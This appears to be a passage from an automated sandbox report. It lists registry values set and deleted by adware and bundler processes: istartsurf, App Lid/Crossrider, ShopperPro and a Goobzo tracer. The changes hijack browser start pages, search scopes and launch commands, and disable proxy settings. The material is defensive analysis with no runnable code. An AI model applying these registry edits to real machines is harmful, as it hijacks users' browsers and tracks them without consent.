[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "smt"
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"UID" = "267123711_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"ptid" = "smt"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"

[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=smtȀ"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

The process testlsp.exe:4312 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "F6 4B FB 68 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TimeStamp" = "1429400145"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "3"

"TimeLimit" = "1"
"TracerDoBackup" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 59 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"
"TimeStamp" = "1429400145"
"TimeLimit" = "1"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process 01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe:4404 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\Wow6432Node\App Lid\Sxuc s6UHdkkBMI3TPbMDdOjupuw7F18Q7PshVRAk FZxDEu/apwrp/9MdF8gTh0dCgXajutsY2KOoFd bv1IitpbTes0RLNENToBGpPazaoliQi1tkegTAcOIGyiV3QRp6V6OquZlyL /e6vfFjGnQ2gaaJ1Jlo4GCXzibNflw=]
"llN1Jcd35X4oPnbdFkuoaACNUqQF3snJnuz/hEY7eN/KVqlSiUdbHUs0LaqrObNekoMAj 6UjKIgs U8d5qa1I/EEhPonbr1w3ffKbLitE1rN/cC9quJsxaJcPzDykUgzwFqrF/ Gzt 478ht9jhE3pvsTEzQ23gIYgcxI94mLs=" = "1"

[HKLM\SOFTWARE\Wow6432Node\App Lid\U/mwtMJQRCKR0dU2rxQ4oph6X45x6O83/tPa4qzbRFFQlpD8vi6EOqZi22NegCITusO1G3TtiH4LD Z8Lxftub6x5B8oXx7BwmBtVZA3jXV8s 2z06x6XpZkQN/5ATUtsPzEooip2Zh6xCXLYw dv uJG8jyegsaBUbTRn9nZDo=]
"Ul0n1X03IbQ6xiPBCEDslxZ9fsRrLJ/vqSZLr9gZ0O KUCestLVRWje2vR4RIlDDKH6ZKOwvlLyt17ra1z7xzZbKWwqNFFUjlmufcqRV4ch2iTPwfFjrdfz6c e4uUdC3qjqU0STqs6kBy2ggedKg6oa4w0h8SvBpRP2bxSQ61k=" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The process powershell.exe:3812 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:2532 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3740 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process setup.exe:1832 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\AccDownload.dll,"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files% (x86)\ShopperPro\SPremove.exe"
"DisplayName" = "Shopper-Pro"
"DisplayIcon" = "%Program Files% (x86)\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files% (x86)\ShopperPro\ShopperPro.exe"

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process GLJ625B.tmp:3268 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "C:\Windows\SysWow64\AniGIF.ocx, 1"

[HKCR\Wow6432Node\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\Wow6432Node\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\Wow6432Node\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\Wow6432Node\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\Wow6432Node\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "C:\Windows\SysWow64\AniGIF.ocx"

[HKCR\Wow6432Node\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "C:\Windows\SysWow64\AniGIF.ocx"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "C:\Windows\SysWow64\AniGIF.ocx"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCR\Wow6432Node\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Wow6432Node\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\Wow6432Node\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCR\Wow6432Node\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\Wow6432Node\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "C:\Windows\SysWow64\"

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "C:\Windows\SysWow64\AniGIF.ocx"

[HKCR\Wow6432Node\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\Wow6432Node\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

The Malware deletes the following registry key(s):

[HKCR\Wow6432Node\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The process Bxaze.exe:1776 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\App Lid\Installer]
"BundledFirefox" = "1"

[HKCU\Software\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"Publisher" = "Lid"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "44 E1 EB 7E 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"DisplayName" = "App Lid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "FD B6 3B 7D 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"UninstallString" = "%Program Files% (x86)\App Lid\Uninstall.exe /fcp=1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"CrPublisherId" = "25286"

[HKCU\Software\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKCU\Software\InstalledBrowserExtensions\25286]
"65743" = "App Lid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286]
"65743" = "App Lid"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"DisplayVersion" = "1.36.01.22"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5D 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"CrAppId" = "65743"
"DisplayIcon" = "%Program Files% (x86)\App Lid\utils.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\InstalledBrowserExtensions\Lid]
"65743" = "App Lid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\25286]
"65743" = "App Lid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKLM\SOFTWARE\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process smt_istartsurf.exe:3284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "CF 09 4B 61 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\AccDownload.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\474.json,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 51 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "13 98 07 63 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process cmdshell.exe:1988 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "44 E1 EB 7E 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

